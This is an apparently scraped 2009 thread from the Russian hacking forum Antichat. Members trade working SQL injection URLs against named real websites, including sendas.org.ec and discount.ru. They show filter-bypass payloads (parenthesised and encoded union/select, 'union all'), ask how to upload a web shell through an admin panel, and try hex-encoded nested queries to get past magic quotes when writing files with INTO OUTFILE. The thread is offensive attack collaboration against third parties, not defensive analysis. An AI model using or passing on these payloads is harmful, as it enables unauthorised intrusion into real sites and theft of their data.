Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
19.12.2009, 17:44
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
http://www.sendas.org.ec/contenido.php?idM=[SQL]
Ещё один фильтр SQL иньекций с новым подходом.
Режет union и select при условии, что те упоминаются вместе и последовательно.
То есть так:
Код:
http://www.sendas.org.ec/contenido.php?idM=-1+union+select+1--&idP=0&lan=1
Ошибка 403.
А вот так:
Код:
http://www.sendas.org.ec/contenido.php?idM=-1+select+union+1--&idP=0&lan=1
Работает.
Как обойти?
Последний раз редактировалось Nightmarе; 19.12.2009 в 17:46..
|
|
|
19.12.2009, 17:47
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
ну например так:
http://www.sendas.org.ec/contenido.php?idM=-1+union(select+1)--&idP=0&lan=1
added
http://www.sendas.org.ec
/contenido.php?idM=-1+union(select+1,2,3,4,5,6,7,8,9,version%28%29,1,2 )--&idP=0&lan=1
Последний раз редактировалось geezer.code; 19.12.2009 в 17:49..
|
|
|
|
19.12.2009, 17:53
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
Сообщение от geezer.code
ну например так:
http://www.sendas.org.ec/contenido.php?idM=-1+union(select+1)--&idP=0&lan=1
added
http://www.sendas.org.ec
/contenido.php?idM=-1+union(select+1,2,3,4,5,6,7,8,9,version%28%29,1,2 )--&idP=0&lan=1
Код:
http://www.sendas.org.ec/contenido.php?idM=%28-1%29union%28select%281%29,%282%29,%283%29,%284%29,%285%29,%286%29,%287%29,%288%29,%289%29,%28version%28%29%29,%281%29,%282%29%20%29--&idP=0&lan=1
без мочилова мозга мон и так
Код:
http://www.sendas.org.ec/contenido.php?idM=-1+union+all+select+1,2,3,4,5,6,7,8,9,version%28%29,11,12&idP=0&lan=1
Последний раз редактировалось [x60]unu; 19.12.2009 в 17:56..
|
|
|
|
19.12.2009, 17:58
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Спасибо всем. Пашет на ура!
|
|
|
|
19.12.2009, 17:59
|
|
Участник форума
Регистрация: 17.03.2009
Сообщений: 234
Провел на форуме:
1031617
Репутация:
128
|
|
http://www.discount.ru/search.html?find=1%27+and+1%3C0+union+select+1%2C2 %2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C0%2C1%2C2%2C33%2C4% 2F*&search=%E8%F1%EA%E0%F2%FC
что дальше? что-то застрял..
|
|
|
|
19.12.2009, 19:51
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
немогу залить шелл через админку. Просто тупо не через что не заливается, да и путей залития практически нет, только баннерная реклама. Есть еще какие либо способы заливки шелла, и получения доступа к БД?
|
|
|
|
19.12.2009, 19:52
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Есть. Купить мозг и назвать хотя бы ГДЕ ты пытаешься это сделать или сразу дать ссылку
|
|
|
|
19.12.2009, 21:47
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Очередной вопрос по безопасности.
Товарищем Scipio был опубликован способ обхода Magic Quotes при заливке шелла через into outfile
Вот собственно сам способ
Так вот. У меня та-же ситуация щас, есть рутовый MySQL + Иньект с Magic Quotes
Полей тоже 3. Выводится инфа на экран только во 2 поле.
Вот в неё я и подставляю захексованый второй запрос:
Код:
id=-99999+union+select+1,0x2D3120756E696F6E2073656C65637420276D616769635F716F74657320697320737578272F2A,3/*
Но он выполняется как обычный текст, выводит просто:
-1 union select 'magic_qotes is sux'/*
В виде текста и всё....
Пробовал конечно /* менять на -- и т.д... но больше никак допереть не могу... Надеюсь что всё-таки что то можно сделать. |
|
|
|
19.12.2009, 21:51
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
скипио показал пример с двойным запросом. это типа когда одно из полей результата первого запроса идёт во второй запрос.
у тебя ошибку выдает если в какое-нибудь поле подставить 0x27 = ковычка ?
__________________
Появляюсь редко. Важные дела в реале.
|
|
|
|
19.12.2009, 21:52
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от Nightmarе
Очередной вопрос по безопасности.
Товарищем Scipio был опубликован способ обхода Magic Quotes при заливке шелла через into outfile
Вот собственно сам способ
Так вот. У меня та-же ситуация щас, есть рутовый MySQL + Иньект с Magic Quotes
Полей тоже 3. Выводится инфа на экран только во 2 поле.
Вот в неё я и подставляю захексованый второй запрос:
Код:
id=-99999+union+select+1,0x2D3120756E696F6E2073656C65637420276D616769635F716F74657320697320737578272F2A,3/*
Но он выполняется как обычный текст, выводит просто:
-1 union select 'magic_qotes is sux'/*
В виде текста и всё....
Пробовал конечно /* менять на -- и т.д... но больше никак допереть не могу... Надеюсь что всё-таки что то можно сделать. Ты посмотри внимательно код - там двойной запрос, точнее два запроса, а у тебя скорее всего один, как и во всех скулях...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x60]unu](/avatars/avatar84758.gif){kind=avatar}
Похожие темы
Линейный вид
